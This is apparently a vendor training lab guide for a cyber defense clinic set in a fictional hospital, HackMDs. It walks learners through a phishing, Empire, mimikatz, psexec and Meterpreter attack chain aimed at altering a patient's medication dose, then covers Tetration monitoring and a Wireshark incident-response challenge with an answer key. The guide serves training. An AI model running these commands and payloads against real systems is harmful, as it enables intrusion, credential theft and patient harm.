Make time for this lab which is longer than others. Expect to spend two-four hours to complete all scenarios.

Lab Resources

Attacker Resource 1: Kali Linux sitting on the outside network

Attacker Resource 2: Ubuntu Server hosting various tools for the attacker

Target Resource 1: HackMDs internal user

Target Resource 2: HackMDs web portal hosting patient medical dosage

Welcome to the Empire!

Now, you will start up Empire. .

Before you begin

As the attacker, you will be connecting to our Attacker Kali Linux system. This is where you will stage your attacks.

Prerequisite 1: Connect to the Kali Linux system.
Prerequisite 2: Click the terminal icon to open the terminal:

Procedure

1	When you are inside that folder, type `./start-empire`
2	Use the command `root@kali:# cd /root`

You will see that empire has started in a "Screen" session. Let's connect to it and interact with it.

3	To see if Empire is running, you can type `screen -ls`.
4	To attach to the Empire Session, type `screen -r empire`. Note: Empire is an exploitation simulation tool that is designed to simulate advanced attacks xtremely difficult to defend against. For this lab, we have simplified the attack by using the default settings. In the real world, attackers will change various aspects of the attack such as the callback behavior, associated URLs and obfuscate the agent to prevent detection.
5	Leave your Empire window up. You will want to come back to it later.

Now you will launch the phishing attack used by Mr. Black to infect the HackMDs administrators.

6	Click the Terminal icon to launch a new terminal window. Note: The email content does not matter, because you are acting as both Victim and Attacker. In the real world, you would need to develop a clever message that would trick your target to perform the following actions or they would probably delete your email.
7	To go to the desktop, use the command `cd /root/Desktop`.
8	Run the script to send the phishing emails; type `./send-phish.sh`. Note: There is a period (.) before the "`/send-phish.sh`" part of the command. Try running from the root. If this fails, go to the Desktop and run the script.

What to do next

Move to the next scenario where you will play the Victim (aka user within HackMDS) who receives the fake email, opens it, and becomes infected with ransomware. The adventures have just begun!

Gone Phishing

Next, you will play the part of the Victim, aka user within HackMDs who receives the fake email and opens it, which results in their system infected with ransomware.

Procedure

1	Click the Back button on your browser to return to the guacamole window with all the sessions:
2
3	Choose the Dr. Desktop. At this point, you are acting as the victim. In this example, you are the employee Dr. Howser.
4	Log in to the DR workstation, and open Outlook from the desktop icon.
5	It may take a moment or two for the mail to reach the mailbox. When you see the fake email in Dr. Howser inbox, select it.
6	Double-click the Word Document and read it. Keep in mind that this content represents how users would fall for this phishing attack and execute an unauthorized file. This happens all the time in the real world.
7	Microsoft Word program will now star tup. In the Microsoft Word document, you will be asked to “Enable Editing” in the Protected View yellow ribbon bar. Click Enable Editing button then from the Security Warning, click Enable Content.
8	When the file has executed, the Phishing Document will tell you to enable macros. Click Enable Content.
9	The command-line window will open behind the outlook client. Real malicious software would run in the background to avoid things like this since this behavior would alert the user that something is not right with the file. We didn’t focus on stealth since this is a lab environment. Real malware would hide and attempt to spread at this point also.
10	The command-line window will open behind the outlook client. Now close the Microsoft Word application completely.
11	When you see the error about spoolsvc.exe not starting, click Close the Program.
12	The ransomware and other infections are of no consequence to our labs, so at this point we will continue back on the Kali Linux environment. The following illustrations show the system infected with the ransomware used by Mr. Black.
13	This typically takes three to seven minutes to show up, but you do not need to wait.

This attack will be remediated by the HackMDs SOC however, they will not see the hidden exploitation that you will use as Mr. Purple.

Next, it's time to check the connection table in Kali Linux and move onto our Empire Implants!

Empire Implants

Empire implants work differently than you might think. Whil some tools (Immunity Canvas, Metasploit Framework, or Core Impact) act more like RAT’s or Remote Access Trojans, Empire uses an implant-based approach. The agent will check from time to time for new commands or to deliver data to a remote command and control server. This check-in process is similar to beaconing verses leveraging a consistent tunnel. Empire is great for hiding communication between the attacker and implants making it an extremely effective method to own a target. In this scenario, you will begin to interact with our Empire Agents.

Procedure

1	Click back on the main browser to get back to the default GUAC terminal window. Select the Kali Linux session to return to that session.
2	On your Empire terminal you should see something ‘SIMILAR’ to this but not quite with the same verbiage as shown. Your agent will have a different agent GUID than this example. Currently mine is set to K49HUM86 but yours will be different.
3	Let’s rename our agent so that we can keep track of which agent is which. To rename the agent, using the following commands:
4	Click enter to access the command terminal. Empire will show the "(Empire) >" command prompt when you click enter within the terminal window.
5	Type “`stager/windows/launcher_bat`”
6	Type “`agents`”
7	Type “`rename <ID> DR`”
8	When this is done you can now type “agents”. This will show you the agents listed. You should see your agent is now called DR.
9	If you type help on this screen, you will see a variety of items, some of the more interesting ones is working-hours, losslimit, and autorun. You can explore executing these and other commands during a break. Note: *HACKMDS\dhowser has an asterisk, which means that this particular agent is using administrator privileges on the device which is an elevator system access.
10	Interacting with a specific implant can be done by using the interact command. Let’s do this now. Type “interact DR” to interact with the infected DR workstation. Let’s do some basic reconnaissance of the system now that we can interact with it.
11	Type the command “`sysinfo`”. It may take a minute to generate a response. You will see debugging information along with other interesting information.
12	Before we explore more advanced use cases with our infected system, let’s see if we can find out some more information about the system such as what antivirus is running on the system. Click enter to bring up the "(Empire" DR) >" prompt. Type the command “usemodule situational_awareness/host/antivirusproduct” to take you to the proper folder. You can click "tab" to auto fill each part of this command.
13	Type “`run`”. When you run this command, you will notice that there is no antivirus/antimalware installed. This is by design for our lab, but in a real environment you are likely going to see it installed. It may take a minute or two for the results to show.
14	Next type “`back`” to return to the main command prompt.
15	Now run the following module to find the Domain Controllers:
16	usemodule situational_awareness/network/powerview/get_domain_controller
17	(Empire: powershell/situational_awareness/network/powerview/get_domain_controlller) > execute
18	Using the information you found, you can now add AD 1 to the list of identified devices. Where are you now? At this point, you have launched a ransomware attack to distract the HackMDs SOC. You planted an Empire dropper and used to launch tasks from the infected system. You researched the type of system that is infected and what type of antivirus is installed. You also identified the HackMDs AD system, which is a great next target. You did all of this in a fileless manner to evade detection from antivirus and other file based security tools. There are many approaches Mr. Black could take from this point. One possibility is to dump the DNS records and research systems until a potential target is identified. Another approach is to scan the network and attack anything that has vulnerabilities. A third approach could be to spread malware through the AD system, which likely has holes in the firewall and access to multiple virtual networks. For this lab, Mr. Black’s goal is to gain access to the electronic medical record (EMR) portal containing the CEO’s data. This way he can modify treatment to a lethal dosage. That portal that controls this information is emr.hackmds.com and only available to those with the proper credentials. This means Mr. Black needs to land domain administration level access. He assumes Dr. Peterson would have this since he has been the person on the news representing the lead caretaker of the CEO. At this point, anybody with domain level access would be ideal. Now that you, as Mr. Black have inside access, it’s time to pivot to other systems and launch attacks from the inside until you can land administration level access. Once domain level access is accomplished, we can either target Dr. Peterson or see if domain access will get us into the emr.hackmds.com portal with rights to modify the CEO’s medical treatment. We will take that action once we get to that point in the attack and assess the situation. Let the attack continue...

Find More Admins: Part 1

Understanding who has what privilege on a Microsoft Domain and where those particular Administrators log in is one challenge an attacker faces. In this scenario, you will use a tool called "Bloodhound" that ingests information about the domain; for example, who has what rights, who is logged into what computer, and more.

The attacker, Mr. Black, will leverage this information about the domain and where HackMDs users are currently logged in. You will specifically look for other administrators logged in and at the systems to which they might be connected.

When you have gained access to these systems, you can dump password hashes and retrieve log-in information for more systems. Will one of these systems allow us access into patient biomedical controls? Let's see what we can get using Bloodhound.

Reminder: You must log in as specific users for this lab to work. If you have not done this already, then you may not see the same results you will see in this guide as you go through the demo.

Important:

For this lab to work, you must log in to Jumphost 2 and Dr. Jumphost 2 represents lpeterson, who will be a target for the attack. Please log in to Jumphost and the Dr. workstation before you continue this scenario.

Procedure

1	First, we will need to create the Bloodhound data from within the DR’s machine. We can do this by first starting a Bloodhound Agent. Use the following commands: Caution: `usemodule` will fail if you do not use the Back command to back out of the existing module. `usemodule management/invoke_script` `set ScriptCmd Invoke-BloodHound -CollectionMethod All` `set ScriptPath /working/SharpHound.ps1` `info` `execute` Tip: Depending on the size of your window, you might see the commands drop to the next line. If this happens, ignore it and continue typing.
2	Verify the commands with the info command before executing.
3	Wait up to five minutes for the script to run.
4	Enter the following commands:

```
"back"
```
```
"shell dir"
```

This will return a listing of files in the Temporary Internet Directory

5	The BloodHound zip file is provided in the following way: `<timestamp>_BloodHound.zip`
6	In the example above, it is `20190604235313_BloodHound.zip` Tip: If you don't see the file yet, just give it another minute or so and run the "`shell dir`" command again.
7	To download this file to your computer, run the following command:`download <filename>`
8	Observe that in the above example it would be: "`download 20190604235313_Bloodhound.zip`"

This would download it to a path that is similar to the source:

/opt/Empire/downloads/<Machine ID>/c/Users/Dhowser/AppData/Local/Microsoft/Windows/Temporary Internet File

Note:

Pay attention as the machine's original ID before renaming it to DR is utilized in the path. Make note of this, for when you need to browse to the bloodhoud zip file.

9	Locate the BloodHound icon on the Kali desktop (Red Dog Icon) and launch it.
10	When you have launched BloodHound, you will see it pause for a moment while it logs in. Note: If you get a "No Database Found" error message, open a terminal window, and type "`neo4j stop`" followed by "`neo4j start`" to reboot the database. Then, re-open Bloodhound.
11	When you are logged in, upload the SharpHound file into the system: Click the Upload icon.
12	Remember the location above because you will need to browse for it later.
13	Click Other Locations > Computer, and then enumerate the path to locate the file.: /opt/Empire/downloads/<Machine ID>/c/Users/Dhowser/AppData/Local/Microsoft/Windows/Temporary Internet Files Tip: If you do not see the file within the Downloads folder (aka, the unique Machine ID), try downloading it a second time.
14	Review the "Upload Progress" window.
15	Close the Upload Window.

Find More Admins: Part 2

At this point, you are ready to investigate what details you collected.

Procedure

1	When the upload is complete, you can use the Hamburger Menu in the left Corner of the screen to perform pre-built queries. Click the Hamburger icon, then click Analysis
2	Choose the “Shortest Path to Domain Admins Query”, then select the domain "DOMAIN ADMINS@AD.HACKMDS.COM" Note: It sometimes much better for an attacker to not be so sloppy and go after Domain Admin. There are more elegant ways to stay stealthy in Active Directory. For this lab, we are just going to “go for it”.
3	From here, what you will see is a list of Nodes. These nodes represent items in Active Directory. They could be Users, Computers, Groups, Permissions, Sessions, Access Control Lists and more. For the purposes of our graph what we have is the Domain Admins group on the right, a set of Uses belonging to that group. In addition we have Users that are administrators to the Active Directory Computer. If we can land on this computer as a local administrator we may be able to read the Password Hash of a Domain Administrator on that computer and move further into the domain. You can click the hamburger menu to remove the query popups to see the entire diagram. It looks like our next computer to attack is Jumphost. Note: Your build out may not be laid out as below, but it will be similar.
4	Jumphost 1 was chosen because both "DHOWSER" and “Administrator” both have accounts on it. (Remember, you should have logged into jumphost2. If not, those login credentials will NOT be in memory)
5	Now that we have found our next potential target, our next goal is to gain access. Go back to the "empire" implant, and click the Empire tab.
6	Press Enter to bring back the prompt.
7	Our next step is to attempt to dump the DR's systems known user credentials, which should work because we are running as a user that is a local administrator on that system. This process is run in powershell and is fairly intrusive on the CPU of the host. One of the tradeoffs for not being an actual binary is a performance hit on the remote system. This is important to know because it will decrease the attackers ability to fully hide. We will use the built in "mimikatz" function from empire.
8	Mimikatz is a Windows post-exploitation tool written by Benjamin Delpy (@gentilkiwi). It allows for the extraction of plaintext credentials from memory, password hashes from local SAM/NTDS.dit databases, advanced Kerberos functionality, and more.
9	Type "mimikatz" from the DR prompt.
10	After the task is initiated, you will see a dump of the LSA information on the screen.
11	Did you catch all that and jot it down as it went by? Just kidding!
12	Typing the "creds" command will allow us to see the credential store populated by mimikatz
13	Here we can see the user, the domain, and the plaintext password of C1sco12345. Note you may need to move the terminal window screen wider to see all passwords.

Next, we need to find the IP address of our Jumphost target. We want to issue an nslookup for our target on the DR worstation

14	Issue the following command at the (Empire: DR) prompt: `shell nslookup jumphost.ad.hackmds.com` BAM! That worked! Now that you have your target’s use credentials and IP address, you can log in to that device and pivot to that system. For our lab, you can see the password for a few different user accounts, including “`dhowser`” as user with password `C1sco12345`. You can use thse credentials to access the Jumphost--our target system.
15	To access the target system.: Type “`usemodule lateral_movement/invoke_psexec`” and press Enter.
16	Type “`info`” and see the options you have presented
17	We need to setup this module. Type the following commands to configure the module `set Listener http` `set ComputerName 198.19.10.50` `execute` `Type “y” when prompted about module not opsec safe, run?` Note: The 198.19.10.50 agent will not communicate using that IP Address. Because we are using our Bastion host, it will contact this host directly. Notice that the contact back is 198.18.133.50. This is a quirk of our lab. Because of this, you will not see much indication from our NetFlow (Stealthwatch) or Firewall (Firepower) system. For these, we will us a different host.
18	When this task runs, you should have a new agent connected to the jumphost system found at 198.18.133.50.
19	Type “`agents`." This takes you back to the Agents menu.
20	To rename the agent to JUMPHOST, type “`rename <AGENT> JUMPHOST”` where <AGENT> is the current name. For the next example, the agent name is MSC3y64W.
21	When the operation has completed, type `agents` again, and observe the name on the left changed to JUMPHOST.

Interact with Jumphost1

In this scenario, you will interact with our new agent.

Procedure

1	At the command prompt, type “`interact JUMPHOST`”. You should now see the command prompt shows JUMPHOST.
2	As in the prior step, let's run mimikatz on the jumphost to gain access to passwords of other users found within this system's memory.
3	Just like before, you will see a dump of the credentials on the JUMPHOST. Scroll by these.
4	Type "`creds"` to see a list of all the credentials from the two runs.
5	The specific user we are after is lpeterson (Lawrence Peterson).This user is our target doctor’s system that we can leverage to get close to the targeted CEO being treated at the hospital. Note: Empire is great for getting us login credentials to the target’s system however, what if we wanted to attack the HackMDs website and do some manipulation? For example, we find that the CEO’s medical dosages can be controlled from a patient portal. Modifying these could turn the treatment into a weapon! Some options for manipulating a website might include: VPNs can be provisioned since you now have a valid credential. VPNs for the valid credentials already exist. You can install a better remote agent tool that allows for pivoting. Now, we will go ahead and get another Implant going. There is another host that is on the network that we will use to build the appropriate artifacts. During our Bloodhound exercise Mr. Purple sees a workstation called WOW.AD.HACKMDS.COM. We will put an implant on that system as well.
6	In Empire, type the following:

```
(Empire: JUMPHOST) > agents
```
(Empire: agents) > interact DR

7	To find the IP address of our target: Issue an `nslookup` for our target on the DR machine.
8	`(Empire: DR)) > shell nslookup wow.ad.hackmds.com`
9	Just as you did in previous steps, you will again invoke psexec to install the agent dropper on the wow workstation and allow us to access it via empire.
10	Now type

(Empire: DR) > usemodule lateral_movement/invoke_psexec
(Empire: powershell/lateral_movement/invoke_psexec) > set ComputerName 198.19.30.100
(Empire: powershell/lateral_movement/invoke_psexec) > info -- (Notice that the listener is still http from the prior run)
(Empire: powershell/lateral_movement/invoke_psexec) > execute
Answer Y to the “Module is not opsec safe, run? Prompt

11	You should see a new connection back in your agents list. Now let’s type the following:

(Empire: powershell/lateral_movement/invoke/psexec)> agents
(Empire: agents) > rename <AGENT ID> WOW

To get the credentials of this system, you can run mimikatz on the target system:

(Empire: agents) > interact WOW
(Empire: WOW) > mimikatz

You will see a list of credentials scroll by as the job completes. Type creds to see all the credentials in the credential database at this time.

In the next scenario, we will install a better remote agent tool known as a Meterpreter on the target system.

Upgrade to Meterpreter

In this scenario, we will build a tunnel into the HackMDs internal network and browse it with full keyboard access. To do this, we need to enable port forwarding. Unfortunately, Empire is a lightweight implant so it doesn’t offer this functionality. For this reason, we must switch to a different remote agent that we call a Meterpreter.

What is the difference between a lightweight agent and full Remote Access Toolkit (known also as RAT)? Intentionally behaving like a RAT, Meterpreter has facilities for routing and switching live traffic. Empire acts more like an agent that checks in and does work. This means Empire cannot offer functionality like modifying routing. Because we want to build a proxy on the target, we will use a Meterpreter to accomplish this task.

In order to upgrade our access to a RAT, we are going to perform the following tasks:

Enable a multi-handler.
Configure a foreign listener.
Execute the agent.

 Let's begin!

Procedure

1	Open a new terminal window and type the following:

root@kali:/# cd /root
root@kali:~# msfconsole

2	When metasploit launches, you might see errors but you will eventually see the following the prompt:
3	Type “`jobs -K`” to kill any existing jobs.
4	Type “`show options`”
5	We need to modify this exploit for our target. Use the following commands to modify the exploit. `msf exploit(multi/handler) set PAYLOAD windows/x64/meterpreter/reverse_http` `msf exploit(multi/handler) > set LPORT 81` `msf exploit(multi/handler) > set LHOST 198.18.133.6` `msf exploit(multi/handler) > run –j`
6	Your results should look like the following
7	Next, we need to create a stageless meterpreter that will upgrade our shell access within the target. We are going to do this using our new reverse handler we just established to 198.18.133.6
8	Open a new terminal. Type the following commands to connect through our new established connection. Make sure the listening port matches whichever port you used.

root@kali:~# cd /working
root@kali:/working# msfvenom –p windows/x64/meterpreter_reverse_http LHOST=198.18.133.6 LPORT=81 –f exe –o /working/winlogin.exe

9	We intentionally called it winlogin.exe, which is only on character off Microsoft’s winlogon.exe. Our goal was to try to obfuscate the bad program from th actual good one by making it harder to detect. Note: The major difference between stageless Meterpreter and staged Meterpreter is that a staged Meterpreter is very small and only contains enough information to download the entire Meterpreter RAT. A stageless Meterpreter contains everything.
10	You should see that a payload was created and saved as `/working/winlogin.exe`.
11	Recall the reasons we are performing this attack. Our goal is for Mr. Black to be able to modify the CEO’s medicine dosage, which is managed by the patient portal. Let’s first test to see if we can access the system. While still on the Kali system, open a web browser.
12	Go to http://emr.hackmds.com. (Note the DNS name is HACKMDS.COM, not AD.HACKMDS.COM) This is located on the DMZ server and what luck, we hit it but can’t access it from the outside. We need to get inside to be able to log into it.
13	Next, we will launch our Meterpreter session and pivot through the JUMPHOST we previously compromised. Go back to your Empire terminal. It is the one with the JUMPHOST prompt as shown.
14	Type the command “upload /working/winlogin.exe C:\windows\system32\winlogin.exe” representing us uploading the meterpreter we just created over our Empire lightweight connection. We could put this in any directory, but we are trying to hide from being detected, so we placed it in the windows\system filter along with other system programs.
15	Let’s validate this worked. Type the command “shell dir c:\windows\system32\winlogin.exe”. You should see winlogin.exe returned with the date of the lab for the creation date. We shell know this is the file you just dropped on the WOW device.
16	Now that our meterpreter is installed, lets run it by typing the command
17	(Empire: JUMPHOST) >shell c:\windows\system32\winlogin.exe
18	Go back to the Metasploit console tab you previously opened. You should now see a connection event is live.
19	You can now interact with this session in Metasploit. This can be used to build a tunnel between our attack machine on port 1111 to the remote webserver. Use the following commands to accomplish this. The default first session should be 1, but to validate you may type "sessions-l"
20	Let's connect to the session and add a port forward using the session we just established
21	msf exploit(multi/handler) > sessions –i 1
22	meterpreter> portfwd add –l 1111 –p 80 –r 198.19.20.5
23	At this point, you should be ready to attack the emr.hackmds.com webserver.

Mr. Black Wins!

Procedure

1	How can we get to emr.hackmds.com from our localhost? We need to modify the routing table to do this. With our newly established Meterpreter session, we can accomplish this goal. Then, we can use our stolen credentials and access the CEO’s medical records. Our attacker goal is within reach...
2	In a new terminal window, type the following command to edit the host file.

root@kali:~# leafpad /etc/hosts

Configure the file so that emr.hackmds.com resolves locally. Add the line “127.0.0.1 localhost emr.hackmds.com” as shown.

Save and close this file.

Now, attempt to access the web portal from the browser. This time, click http://emr.hackmds.com:1111.

What username and password do you need to use? Let’s examine the known passwords we have collected:


Username	Password
dhowser	C1sc012345
administrator	C1sc012345
nurse	C1sco12345
lpeterson	!!coco92!!

Which login works? Is it Administrator/C1sco12345? How about dhowser/C1sco12345? Maybe lpeterson/!!coco92!!? Remember lpeterson was a doctor we were targeting that is treating our target CEO (Emily Williams). When

When you find the login, you will have access to the patient portal and can modify the CEO’s medical dosage. Keep in mind that this can be lethal if done incorrectly!

Monitor Threats and Performance with Tetration

Value Proposition: For this scenario, you will play out the role of an externally managed service provider assigned to monitor HackMDs’s datacenter. You are fortunate to have Cisco Tetration, which has mapped out all application dependences providing complete visibility into communications and potential risks. HackMDs has asked for a whitelist approach to access within the datacenter. This approach provides access to only what is required for successful operation and monitoring for potential risks. Risks include vulnerabilities, unauthorized access, or gaps in the access control policies.

The following diagram demonstrates Cisco capabilities.

In the world of security, a whitelist is more secure than a blacklist approach. However, many organizations are forced to use a blacklist approach, due to the challenges with whitelist enforcement. Cisco Tetration overcomes those challenges by dynamically learning what is considered “trusted” and dynamically adjusting access rules in real time allowing whitelist security to become a reality.

Many organizations will outsource monitoring of their network to a managed service provider. Agreements typically include specific monitoring points and types of service such as Tier 1 Support. For this scenario, you will play the role of an analyst working for the managed service provider assigned to monitor the HackMDs datacenter. Your job is to alert the HackMDs SOC of potential compromises, as well as provide a daily status of top potential risk. You are provided access to HackMDs’s Cisco Tetration deployment from you can investigate any application and communication within the HackMDs datacenter.

Important: You are not permitted to make any changes to policies. HackMDs’s plan is to let Cisco Tetration dynamically adjust whitelist policies without any user interaction. Your only job is to validate potential risk and report.

Lab Resources

Resource 1: Jumphost1 representing the managed service analyst computer
Resource 2: Tetration installed within the HackMDs datacenter

Access Tetration

It is time to start your shift at Michael Hackson’s Monitoring service. You have been assigned to monitor the HackMDs datacenter. Your first step is to log into a Cisco Tetration solution currently installed within the HackMDs datacenter.

Procedure

1	Connect to jumphost 1.
2	Open a web browser and go to https://198.19.193.228. You should see the Cisco Tetration interface.
3	Log in with username mslab@dcloud.cisco.com and password C1sco12345!
4	You should now be logged into the main Cisco Tetration GUI. Since your focus is security, the first step is to access the security dashboard. On the left side of the management interface are the different main Tetration functions. Choose the third one down for security and select the Dashboard.
5	You should see the main security focused dashboard.
6	Your first task is to validate and report any potential vulnerabilities. To view vulnerabilities within the datacenter, click the Vulnerability Score widget.
7	This will bring up a vulnerability focused dashboard. On the left, you will see a workload score distribution with different workloads. Click the top one to see what potential vulnerabilities exist. What you will find when viewing a workload is a list of different potential vulnerabilities within the associated workload. CVSS scores of 8 or higher are considered extremely vulnerable and should be documented for HackMDs to address.
8	Click one of the CVE values, and it opens a website to NIST where you can learn about the details associated with the identified vulnerability.
9	Click outside the Vulnerability Details pop-up to bring the Tetration vulnerabilities overview dashboard back to the forefront.
10	Scroll down until you see the Attack Surface Score widget. Once again, you will see different applications on the left. Choose the top application to bring up details regarding ports used by this application. You will find there are a lot of unused ports. For this example, I’m seeing almost a thousand unused ports in the next image. This application could potentially be exploited if left on an accessible part of the network. This will need be documented and addressed by the HackMDs datacenter vulnerability management team.
11	Click outside the pop-up to return to the vulnerability dashboard. Next, let’s run a forensic review of things that could potentially be bad. Click the left menu, select Security and choose Forensics Analysis. Note that Cisco Tetration has visibility inside the endpoint and traffic between endpoints. This enables end-to-end forensics, which is extremely effective for identifying advanced insider threats. Tetration will monitor for things it has never seen before, privilege escalation, side channel attacks, meltdowns and many other threats that many datacenter administrators are blind to since they occur within the datacenter and typically executed with stealth in mind. You should see any recent events that could be a risk shown on the forensic timeline. You can also move the time range bar and look back to when there are spikes of activity. The first example shows an unusual command.
12	Scroll back to the last spike in activity to find an event where multiple unseen commands were found.
13	Try clicking one of the events. You will pull up a forensics event workflow showing how the execution of the unseen command flowed. This is extremely useful to understand what occurred to make a more accurate judgment against the event. This type of feature is common with sandbox technology, which will run potential threats and monitor what changes it makes to the system as it is ran within the sandbox. Remember, proper security requires People, Process and Technology, which best practice would include a process of validating forensic events to ensure they are real threats rather than assuming a security technology will %100 of the time block anything bad. Try clicking and playing a few flagged processes to see what they did at the time Tetration recorded the incident. Note: Cisco Tetration can be setup to automatically prevent certain activities tied to known malicious behavior. For this situation, the Michael Hackson Monitoring Corporation is not authorized to invoke any changes. Your job is to observe and report anything potentially malicious. Notice that one of the processes is highlighted in orange. This represents the command of interest.
14	To go even deeper into your investigation, click the process highlighted in orange. In this example, it is C:\Windows\System32\ceipdata.exe. Now, you can see multiple details about the situation. For example, you can see which user made the change, what commands are considered unseen, what commands were executed, and all other associated commands. Spend some time looking at the different forensic events. Now that you have reviewed the security posture of HackMDs, your next task is to identify and resolve any application performance issues. This is typically a challenge for organizations, because it is difficult for a managed service provider who is not onsite to determine if the issue is network or application-related. Luckily, you have access to Cisco Tetration, which can look deep into the TCP performance and answer these types of questions. If the application is causing the problem, Tetration can also determine if the issues are on the client side or part of the application itself.
15	Go to the left side menu, click Visibility, and then select Flow Search.
16	You will see the traffic flow within the HackMDs datacenter. Let’s narrow down our search from all time to the last month. Click the time range, which will bring up time range options. Select 1 month and you should see any traffic spikes in the last month like the one shown in the next example.
17	What you see is traffic spikes, but that doesn’t necessarily mean the applications within the datacenter couldn’t handle the traffic. To check application performance, click the filter drop-down option and select App Latency. Now you can see any performance issues.
18	To better understand what is causing the issue, we can add a filter for TCP Performance and choose which issue to filter into. Click the filter bar and type `TCP Performance`. Then select = and you will see four different options to filter into. The top three represent the application, client side or provider being the cause of the issue. Your role represents the network team so your concern would be anything that is the network’s fault. Select Network Limited.
19	Click the Filter Flows button to see if there are any network-related issues that would impact the HackMDs datacenter applications. Since there are no network-related issues in our example, we will report that any performance issues were not caused by the network. You may find a network issue when you perform this lab. In my case, all reported application issues are not a network issue.

Summary

This wraps up your duties for monitoring HackMDs’s datacenter for security and application performance issues. Steps that could take hours to perform, if even possible, with traditional tools can be done within minutes using Cisco Tetration.

Feel free to look more at HackMDs’s datacenter before you end your shift.

Additional tasks you can take are:

Investigate application performance issues and determine if they are client or application related
Look at the different applications running within HackMDs’s datacenter and their relations.
Map out which ports and protocols are used by which applications.
Investigate policies that exist within the HackMDs datacenter.
View various workloads and associated diagnostics.

When you are done, remember to turn in your timecard before you end your workday!

Congratulations! You have now completed this scenario.

Cyber Defense Response Challenge: Incident Response

Value Proposition: We designed the Cyber Defense Response clinic with the goal of demonstrating why various security concepts are important using real work attack and defend scenarios. Our challenge is trying to create an environment that can provide value to people with various levels of skills and experience. The scenarios thus far have followed a script explaining the steps for both the attack and defend exercises. We decided to include one scenario that is scripted differently. In this scenario, you are challenged to come up with your own steps to answer specific questions about an attack that has recently occurred. Consider this an incident response challenge!

Outcome

At the end of this scenario, you will have attempted the Cyber Defense Response Challenge by performing an incident response to a recent attack. You will have investigated a Windows system that you were informed may have been infected with some form of malware based on potential communication to a command and control (C2) server. You will have run Wireshark to view packet level traffic between the IT system and outside world.

Finally, you will have accessed the C2 system assuming you found something and investigated how it functions. Anything more such as the advanced concepts covered in this lab would require you to escalate this situation to a higher tier team using a formal incident response report. Your goal was to avoid having to do that by handing the situation on your own.

Lab Resources

System potentially Compromised: Windows 7 Workstation known as “IT workstation”
Potential Attacker Resource: Unknown outsider

Many steps you will perform require a lot of manual effort and knowledge about where to start your investigation. Tools such as Cisco Firepower, AMP and Stealthwatch would quickly identify this type of malicious behavior and even automatically remediate it. Remediation could be done with Cisco AMP from a file level or Cisco ISE from a network quarantine approach, as demonstrated earlier in the CDC scenarios.

The Cyber Defense Challenge

In this scenario, you are the late-night Tier 1 Cyber Defense Analyst working your normal evening shift. You receive a call informing you that the IT workstation is likely infected due to multiple, unusual alarms. You must figure out if the IT workstation is indeed infected and perform a forensics investigation to answer questions your manager and higher tier will need answered before a formal incident can be documented. If you can handle the incident yourself without escalating to a higher tier, you will be entitled to a sweat bonus, recognition and potential future career enhancement.

This challenge will follow two parts. The first part is figuring out what is happening with the system using Wireshark to examine communication to and from this system. You will find many basic functions such as opening a command line terminal are being disabled by whatever has infected this system. Bummer!

The second part of the challenge will be your only approved incident response. In this case, you will be authorized to access any identified malicious source related to this specific incident. Be aware that “hacking back” is illegal in many cases. For this challenge, you are authorized to investigate the malicious sources, depending upon what you find during your investigation.

When you complete your investigation, write a short explanation of what you think occurred. The Answer Key can be found after the Question section. Challenge yourself by NOT LOOKING at the answer key until you attempt to answer every question. This is the honor system. Don’t cheat yourself! You will find that many of the tactics to answer the questions can be accomplished in multiple ways. Some methods will become obvious when you either attempt to answer a question or view the answer key following your work. Keep in mind that any attack has already occurred and may still be occurring; hence, you are instructed to use Wireshark.

Have fun and good luck!

Note: Real world incident response plans have various levels of support and structure. It is important that a company doesn’t invest incident response resources into every event due to wasting time and resources. A formal response should only occur if an incident is verified as being legit and risk to the organization. This means our challenge isn’t a far reach since your job is to validate this is a true positive before this become a documented incident.

Important: It is NOT best practice to wipe any system you believe is infected. This removes all forensic evidence meaning you will never know how it happened!

The username for the IT server is admin, and the password is C1sco12345.

CDC Challenge Questions

The HackMDs SOC requires the following questions to be answered before a formal incident response can be documented. Any documented incident will follow with a formal alert and response program by the HackMDs forensic unit. This service is very costly and must only be used for real compromises to HackMDs’s cyber defenses. Your goal is to avoid alerting the forensic unit and handling the situation with our own limited capabilities. Good luck!

Set up

You will find the infection has limited what can be ran from this system. Luckily, Wireshark still seems to function properly. There is only one active interface found when you open Wireshark. You will want to let Wireshark run for 1-3 minutes before stopping the capture and seeing what you can find. Make note of any commutation from the outside network (198.18.133.0/24) to this workstation. Wireshark filters will be very helpful (https://firstdigest.com/2009/05/wiresharks-most-useful-display-filters/)

Procedure

1	Open Wireshark using the icon on the desktop.
2	Click Capture, and then select Options.
3	Select the active interface: Click the Local Area Connection and, and then click Start at the bottom right of the screen.
4	Wait about five minutes for the system to capture traffic. It won’t always take five minutes, but it does take a few minutes to capture all the traffic.
5	Click the red square to stop the capture.

Part 1: Questions

Procedure

1	Adversary communicating to infected system IP Address:
2	TCP/UDP ports open:
3	Do you believe the command and control (C2) alarm a false positive? Why?
4	If the alarm is a true positive, what is the IP address of the C2?
5	What type of communication is taking place from the C2?
6	What is the IP address of the attacker?
7	Is there a potential installed client communicating from the HackMDs network?
8	Where is the potentially compromised IT workstation communicating too?
9	What is the DNS name for the malicious website / C2 if one exists?

Part 2: Hack Back!

You are rewarded for your good work. Your peers in the research community have heard of the C2 you identified and know how to access its GUI. Your team lead has provided you with the web location of 198.18.133.5/shop/main.php for this attack based on threat intelligence. The Username and Password are both admin. You decide to do a little poking around. Answer the following question about the C2 server.

In the real world, it is likely illegal to hack back meaning you would likely be breaking the law if you attempted to log into an attacker’s C2 system. We are showing this for simple education purposes about how C2 systems could look like.

Procedure

1	How many targets have been infected by this attacker?
2	What was the last attack executed by this source that was successful?
3	How many attacks / tasks failed?
4	What is the knock interval?
5	What is the version number of the infection?
6	After the infection file ran, where did it get copied to and what is its name? STOP HERE UNTIL YOU FINISH OR NEED TO VIEW THE ANSWER KEY.

Attack Summary

Here is one possible path you could have used to discovery the answers to the CDC challenge. Know that there are many other methods you could have used to get you similar results.

Access to the portal user: admin | password: admin
C2 Location: 198.18.133.5
Attack details: /var/www/html/shop | written in C++/ASM | Ring3 Rootkit | Communications stream RC4 – to Base64

Part 1: IT Workstation Answers

Procedure

1	The first thing to do is look for IP addresses from the outside network. To filter this network, use the command `ip.addr == 198.18.133.0/24`.
2	You should see a ton of traffic going to 198.18.133.5 and 198.19.30.102. If you open a web browser for each of these IP addresses, the 198.18.133.5 will bring up an apache system.
3	The source of this communication is from inside your network, so now you know the IP address of the infected system.
4	Scroll the communication details to see information, such as the port and protocols being used.
5	Scroll and explore within this communication to see some points of interest. For example, there is a 339 post to /shop/order.php.
